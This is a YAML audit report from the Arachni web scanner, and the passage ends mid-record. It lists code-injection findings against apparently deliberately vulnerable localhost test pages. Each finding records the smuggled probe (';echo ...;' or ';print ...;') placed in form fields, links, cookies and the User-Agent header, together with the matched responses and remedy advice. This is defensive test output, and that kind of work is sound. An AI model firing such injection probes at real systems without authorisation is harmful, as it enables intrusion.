--- !ruby/object:Arachni::AuditStore
plugins: {}
sitemap: []
issues:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/php/form/straight
elem: form
method: POST
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;echo 287630581954+4196403186331128;
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ;echo 287630581954+4196403186331128;
:follow_location: true
:injected: ;echo 287630581954+4196403186331128;
:combo:
!binary "aW5wdXQ=": ;echo 287630581954+4196403186331128;
:action: http://localhost:6875/php/form/straight
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/php/form/straight
injected: ;echo 287630581954+4196403186331128;
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: form
remarks: {}
method: POST
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjowMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/php/form/append
elem: form
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;echo 287630581954+4196403186331128;
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default;echo 287630581954+4196403186331128;
:follow_location: true
:injected: default;echo 287630581954+4196403186331128;
:combo:
!binary "aW5wdXQ=": default;echo 287630581954+4196403186331128;
:action: http://localhost:6875/php/form/append
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/php/form/append
injected: default;echo 287630581954+4196403186331128;
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: form
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjowMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/php/link/append?input=default
elem: link
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ! ''';echo 287630581954+4196403186331128;#'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default';echo 287630581954+4196403186331128;#
:follow_location: true
:injected: default';echo 287630581954+4196403186331128;#
:combo:
!binary "aW5wdXQ=": default';echo 287630581954+4196403186331128;#
:action: http://localhost:6875/php/link/append?input=default
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/php/link/append?input=default
injected: default';echo 287630581954+4196403186331128;#
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: link
remarks: {}
method: GET
response: ! '[4196690816913082, 4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjowMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/php/link/straight?input=default
elem: link
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;echo 287630581954+4196403186331128;
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ;echo 287630581954+4196403186331128;
:follow_location: true
:injected: ;echo 287630581954+4196403186331128;
:combo:
!binary "aW5wdXQ=": ;echo 287630581954+4196403186331128;
:action: http://localhost:6875/php/link/straight?input=default
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/php/link/straight?input=default
injected: ;echo 287630581954+4196403186331128;
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: link
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjowMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie2
url: http://localhost:6875/php/cookie/append
elem: cookie
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: echo 287630581954+4196403186331128;
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie valueecho 287630581954+4196403186331128;
:injected: cookie valueecho 287630581954+4196403186331128;
:combo:
!binary "Y29va2llMg==": cookie valueecho 287630581954+4196403186331128;
:action: http://localhost:6875/php/cookie/append
:verification: false
:id: '4196690816913082'
var: cookie2
url: http://localhost:6875/php/cookie/append
injected: cookie valueecho 287630581954+4196403186331128;
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: cookie
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+valueecho+287630581954%2B4196403186331128%3B;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: true
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie
url: http://localhost:6875/php/cookie/straight
elem: cookie
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: echo 287630581954+4196403186331128;
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": echo 287630581954+4196403186331128;
:injected: echo 287630581954+4196403186331128;
:combo:
!binary "Y29va2ll": echo 287630581954+4196403186331128;
:action: http://localhost:6875/php/cookie/straight
:verification: false
:id: '4196690816913082'
var: cookie
url: http://localhost:6875/php/cookie/straight
injected: echo 287630581954+4196403186331128;
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: cookie
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=echo+287630581954%2B4196403186331128%3B
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjoxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:6875/php/header/append
elem: header
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;echo 287630581954+4196403186331128;
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user;echo 287630581954+4196403186331128;
:injected: arachni_user;echo 287630581954+4196403186331128;
:combo:
User-Agent: arachni_user;echo 287630581954+4196403186331128;
:action: http://localhost:6875/php/header/append
:verification: false
:id: '4196690816913082'
var: User-Agent
url: http://localhost:6875/php/header/append
injected: arachni_user;echo 287630581954+4196403186331128;
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: header
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user;echo 287630581954+4196403186331128;
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjoyMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:6875/php/header/straight
elem: header
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;echo 287630581954+4196403186331128;
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ;echo 287630581954+4196403186331128;
:injected: ;echo 287630581954+4196403186331128;
:combo:
User-Agent: ;echo 287630581954+4196403186331128;
:action: http://localhost:6875/php/header/straight
:verification: false
:id: '4196690816913082'
var: User-Agent
url: http://localhost:6875/php/header/straight
injected: ;echo 287630581954+4196403186331128;
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: header
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ;echo 287630581954+4196403186331128;
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjoyMSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: true
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/perl/form/straight
elem: form
method: POST
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;print 287630581954+4196403186331128;
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ;print 287630581954+4196403186331128;
:follow_location: true
:injected: ;print 287630581954+4196403186331128;
:combo:
!binary "aW5wdXQ=": ;print 287630581954+4196403186331128;
:action: http://localhost:6875/perl/form/straight
:verification: false
